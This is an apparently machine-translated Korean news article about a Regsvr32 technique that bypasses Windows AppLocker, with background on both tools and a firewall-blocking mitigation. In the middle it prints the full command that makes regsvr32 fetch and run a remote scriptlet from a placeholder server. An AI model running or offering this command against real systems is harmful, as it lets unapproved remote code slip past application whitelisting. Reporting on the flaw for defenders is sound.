Casey Smith라는 콜로라도 연구원은 Regsvr32가 Windows 10에서 AppLocker를 우회하는 데 사용될 수 있다는 것을 발견했으며 이는 컴퓨터 사용자, 특히 비즈니스 환경의 사용자에게 큰 문제입니다.

AppLocker는 Windows 7 및 Windows Server 2008 R2에서 처음 도입되었습니다. 관리자는 파일의 고유 한 ID를 기반으로 일부 또는 모든 응용 프로그램을 활용할 수있는 그룹 또는 사용자를 지정할 수 있습니다. AppLocker를 사용하는 사람이라면 특정 규칙을 만들어 응용 프로그램이 트랙에서 실행 또는 중지되도록하는 데 사용할 수 있다는 것은 일반적인 지식입니다.

알지 못하는 사람들을 위해 Regvr32를 사용하여 DLL을 등록 및 등록 취소 할 수 있습니다. 이 도구는 명령 줄 유틸리티이므로 원 클릭 도구가 아니므로 고급 컴퓨터 사용자 만 제공하는 기능을 활용해야합니다.

이 기술을 사용한다고해서 컴퓨터 시스템의 레지스트리가 변경되지는 않으므로 관리자가 변경 사항이 있는지 알기가 어렵습니다.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

“여기의 놀라운 점은 regsvr32가 이미 프록시를 인식하고 TLS를 사용하고 리디렉션 등을 수행한다는 것입니다.…… 서명 된 기본 MS 바이너리를 추측했습니다. 따라서 사용자가 제어 할 위치에 your.sct 파일을 호스팅하기 만하면됩니다.

위의 기술은 관리 권한이 필요하지 않으며 레지스트리를 변경하지 않습니다. 또한 스크립트는 HTTP 또는 HTTPS를 통해 호출 할 수 있습니다. 현재 Microsoft는이 작은 문제에 대한 패치를 발표하지 않았으므로이 시점에서 유일한 옵션은 Windows 방화벽을 통해 Regsvr32를 차단하는 것입니다.

흥미롭게도 소프트웨어 대기업은 운영 체제가 직면 한이 보안 문제에 대해 아직 응답하지 않았습니다. 이제 공개적으로 공개되었으므로 향후 패치에 대한 이야기와 함께 회사에서 무언가를들을 것으로 예상됩니다.